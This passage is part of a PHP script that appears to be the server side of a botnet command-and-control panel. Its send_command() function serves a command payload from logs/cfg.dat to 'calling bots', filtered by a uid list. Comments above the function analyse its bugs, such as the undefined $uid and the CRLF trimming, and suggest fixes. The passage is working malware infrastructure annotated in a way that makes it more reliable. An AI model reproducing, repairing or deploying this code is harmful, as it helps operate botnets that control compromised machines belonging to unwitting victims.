// connect-back): send the payload without touching the database.
send_command();
exit;

/**
 * Writes the command payload for the calling bot to the response and exits.
 *
 * If logs/uid.ini is empty every caller receives the contents of logs/cfg.dat;
 * otherwise only callers whose uid matches a line of uid.ini do. Anyone else
 * gets the bare "CMND\r\n" marker.
 *
 * Notes:
 *  - $uid is read below without a `global` declaration, so inside this
 *    function it is an undefined local (null), not the request value set at
 *    the top of the file. `$array[$ei] == $uid` therefore compares against
 *    null, which under loose comparison matches an empty line (e.g. a trailing
 *    blank line in uid.ini), not the caller's uid.
 *  - filesize() returns false when the file is missing and `false == 0` is
 *    true, so a missing uid.ini behaves like an empty one (payload for all).
 *  - Each line is shortened by exactly two bytes (assumes CRLF endings); a
 *    last line without a CRLF loses two real characters. rtrim($line, "\r\n")
 *    would be the safe equivalent.
 *  - The function does not return on the payload paths (exit).
 */
function send_command() {
$cmdname="logs/cfg.dat"; // command payload sent to authorised callers
$cmduid="logs/uid.ini";  // one uid per line; empty file = no restriction

// Empty (or missing - see notes) uid list: send the payload to everyone.
if(filesize("$cmduid") == 0) {
 $fh=fopen($cmdname,"r");
 $cfgdata=fread($fh,filesize($cmdname));
 fclose($fh);
 echo "CMND$cfgdata";
 exit;
}

$array=file($cmduid);
$kolvo=count($array);
for($ei=0;$ei<$kolvo;$ei++) {
 $llen=strlen($array[$ei]);
 $llen=$llen-2; // strip an assumed CRLF
 $array[$ei]=substr($array[$ei],0,$llen);
 if($array[$ei] == $uid) { // $uid is undefined here (no `global`) - compares against null
  $fh=fopen($cmdname,"r");
  $cfgdata=fread($fh,filesize($cmdname));
  fclose($fh);
  echo "CMND$cfgdata";
  exit;
 }
}
echo "CMND\r\n"; // no match: marker only
}

?>